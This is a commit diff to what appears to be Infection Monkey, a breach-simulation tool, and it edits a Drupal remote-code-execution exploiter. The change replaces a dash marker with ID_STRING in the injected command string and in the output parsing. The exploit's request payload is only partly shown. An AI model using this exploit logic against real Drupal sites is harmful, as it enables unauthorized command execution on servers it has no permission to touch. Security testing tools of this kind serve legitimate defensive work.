use ID_STRING instead of dashes

2020-08-31 17:55:04 +03:00 · 2020-08-31 17:55:04 +03:00 · b82a6e48b2
parent c9ea95110c
commit b82a6e48b2
1 changed files with 6 additions and 5 deletions
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@ -8,6 +8,7 @@ import logging
 import requests
 from urllib.parse import urljoin
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.model import ID_STRING
 from network.network_utils import remove_port

 __author__ = 'Ophir Harpaz'
@ -70,7 +71,7 @@ class DrupalExploiter(WebRCE):
            for node_id in node_ids:
                node_url = urljoin(url, str(node_id))
                if self.check_if_exploitable(node_url):
-                    self.add_vuln_url(url)  # Where is this used?
+                    self.add_vuln_url(url)  # This is for report. Should be refactored in the future
                    self.vulnerable_urls.append(node_url)
                    if stop_checking:
                        break
@ -114,7 +115,7 @@ class DrupalExploiter(WebRCE):

    def exploit(self, url, command):
        # pad a easy search replace output:
-        cmd = 'echo ---- && ' + command
+        cmd = f'echo {ID_STRING} && {command}'
        base = remove_port(url)
        payload = {
            "link": [
@ -145,10 +146,10 @@ class DrupalExploiter(WebRCE):
        if check_drupal_cache(r):
            LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
    
-        if '----' not in r.text:
-            LOG.info('[warn] Command execution _may_ have failed')
+        if ID_STRING not in r.text:
+            LOG.warning('Command execution _may_ have failed')
    
-        result = r.text.split('----')[-1]
+        result = r.text.split(ID_STRING)[-1]
        LOG.info(f'Drupal exploit result = {result}')
        return result